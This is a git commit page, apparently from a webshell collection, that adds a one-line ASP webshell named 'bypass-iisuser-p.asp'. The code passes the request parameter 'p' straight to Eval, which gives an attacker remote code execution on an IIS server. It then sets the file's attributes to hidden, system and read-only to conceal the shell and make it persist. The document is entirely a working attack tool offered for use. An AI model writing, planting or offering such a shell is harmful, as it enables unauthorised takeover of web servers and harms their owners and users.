add a asp webshell

bypass iisuser
This commit is contained in:
tennc 2014-03-26 15:41:02 +08:00
parent 3f24988a88
commit c070f0793f

1
asp/bypass-iisuser-p.asp Normal file
View file

@ -0,0 +1 @@
<%Eval(Request(chr(112))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if f.attributes <> 39 then:f.attributes = 39:end if%>